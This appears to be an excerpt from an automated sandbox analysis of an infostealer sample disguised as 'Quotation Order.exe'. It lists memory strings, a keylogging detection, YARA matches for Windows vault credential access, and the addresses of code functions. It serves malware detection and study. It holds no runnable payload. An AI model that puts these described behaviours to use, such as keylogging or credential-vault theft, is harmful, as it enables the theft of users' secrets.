                    Source: svchost.exe, 00000024.00000003.1358375444.000002B80575A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                    Source: svchost.exe, 00000024.00000002.2519246321.000002B805CBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                    Source: svchost.exe, 00000024.00000002.2518633439.000002B805C7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515629844.000002B804E9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                    Source: svchost.exe, 00000024.00000002.2516513363.000002B804F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comwwCP=
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfi
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf(
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf7
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                    Source: svchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1363948684.00000215E6C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, 8WWn.cs.Net Code: lkBm6YL8X
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, 8WWn.cs.Net Code: lkBm6YL8X

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Quotation Order.exe
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CEC990_2_00007FF7C19CEC99
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C8DB80_2_00007FF7C19C8DB8
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C46000_2_00007FF7C19C4600
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19D4D250_2_00007FF7C19D4D25
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CBD300_2_00007FF7C19CBD30
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C25280_2_00007FF7C19C2528
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CC1110_2_00007FF7C19CC111
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C44B00_2_00007FF7C19C44B0
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C8EF00_2_00007FF7C19C8EF0
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19D4DB40_2_00007FF7C19D4DB4
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BEC9915_2_00007FF7C19BEC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B44B015_2_00007FF7C19B44B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B8EF015_2_00007FF7C19B8EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B467115_2_00007FF7C19B4671
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B8DB815_2_00007FF7C19B8DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19C4D2515_2_00007FF7C19C4D25
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BBD3015_2_00007FF7C19BBD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B252815_2_00007FF7C19B2528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BC11115_2_00007FF7C19BC111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19C4DB415_2_00007FF7C19C4DB4
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C1A90D7115_2_00007FF7C1A90D71
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1988EF017_2_00007FF7C1988EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198467117_2_00007FF7C1984671
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1988DB817_2_00007FF7C1988DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198BD3017_2_00007FF7C198BD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198252817_2_00007FF7C1982528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198EC9917_2_00007FF7C198EC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C19844B017_2_00007FF7C19844B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198C11117_2_00007FF7C198C111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C19874F017_2_00007FF7C19874F0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1A60D7117_2_00007FF7C1A60D71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011EB07026_2_011EB070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011EB4C826_2_011EB4C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E4AD826_2_011E4AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011EEF0026_2_011EEF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E3EC026_2_011E3EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E420826_2_011E4208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_0649C48026_2_0649C480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_0649ABF826_2_0649ABF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B65E826_2_064B65E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B55A826_2_064B55A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064BB22826_2_064BB228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B236026_2_064B2360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064BC17026_2_064BC170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B7D7826_2_064B7D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B769826_2_064B7698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064BE39826_2_064BE398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B004026_2_064B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B5CF026_2_064B5CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_069A34D026_2_069A34D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B000626_2_064B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CCB19031_2_00CCB190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CCA90831_2_00CCA908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CC4AD831_2_00CC4AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CC3EC031_2_00CC3EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CCEFE831_2_00CCEFE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CC420831_2_00CC4208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_06287D7831_2_06287D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_062855A831_2_062855A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_062865E831_2_062865E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628B22831_2_0628B228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628236031_2_06282360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628C17031_2_0628C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628769831_2_06287698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_06285CF031_2_06285CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628E39831_2_0628E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628004031_2_06280040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628003B31_2_0628003B
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A467138_2_00007FF7C19A4671
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A8DB838_2_00007FF7C19A8DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19ABD3038_2_00007FF7C19ABD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A252838_2_00007FF7C19A2528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19AEC9938_2_00007FF7C19AEC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A44B038_2_00007FF7C19A44B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19AC11138_2_00007FF7C19AC111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A8EF038_2_00007FF7C19A8EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C1A80D7138_2_00007FF7C1A80D71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012BB4B843_2_012BB4B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012B4AD843_2_012B4AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012BEF0043_2_012BEF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012B3EC043_2_012B3EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012B420843_2_012B4208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_06697D7843_2_06697D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_066965E843_2_066965E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_066955A843_2_066955A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669B21743_2_0669B217
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669306843_2_06693068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669C17043_2_0669C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669769843_2_06697698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_06695CDF43_2_06695CDF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669235343_2_06692353
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669E39843_2_0669E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669004043_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669003F43_2_0669003F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669000643_2_06690006
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191EC9952_2_00007FF7C191EC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19144B052_2_00007FF7C19144B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19174F052_2_00007FF7C19174F0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1918DB852_2_00007FF7C1918DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1918DC052_2_00007FF7C1918DC0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191460052_2_00007FF7C1914600
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1924D2552_2_00007FF7C1924D25
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191252852_2_00007FF7C1912528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191BD3052_2_00007FF7C191BD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191C11152_2_00007FF7C191C111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19259C952_2_00007FF7C19259C9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C192597D52_2_00007FF7C192597D
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19194D852_2_00007FF7C19194D8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1918EF052_2_00007FF7C1918EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1924DB452_2_00007FF7C1924DB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0144B4C856_2_0144B4C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_01444AD856_2_01444AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0144EF0056_2_0144EF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_01443EC056_2_01443EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0144420856_2_01444208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622C48056_2_0622C480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622AF1456_2_0622AF14
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622E29056_2_0622E290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622AF0856_2_0622AF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0622ABF856_2_0622ABF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_06247D7856_2_06247D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_062455A856_2_062455A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_062465E856_2_062465E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624B22856_2_0624B228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624236056_2_06242360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624C17056_2_0624C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624769856_2_06247698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_06245CF056_2_06245CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624E39856_2_0624E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624004056_2_06240040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 56_2_0624000656_2_06240006
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
                    Source: Quotation Order.exeStatic PE information: No import functions for PE file found
                    Source: svchost.exe.0.drStatic PE information: No import functions for PE file found
                    Source: Quotation Order.exe, 00000000.00000000.1254895494.00000259E990E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAluderopolikodiquxeko2 vs Quotation Order.exe
                    Source: Quotation Order.exeBinary or memory string: OriginalFilenameAluderopolikodiquxeko2 vs Quotation Order.exe
                    Source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Quotation Order.exe, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: svchost.exe.0.dr, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
